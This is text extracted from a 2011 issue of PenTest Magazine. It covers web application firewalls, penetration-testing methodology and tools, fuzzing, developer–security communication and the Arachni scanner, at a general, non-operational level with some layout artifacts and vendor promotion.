As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
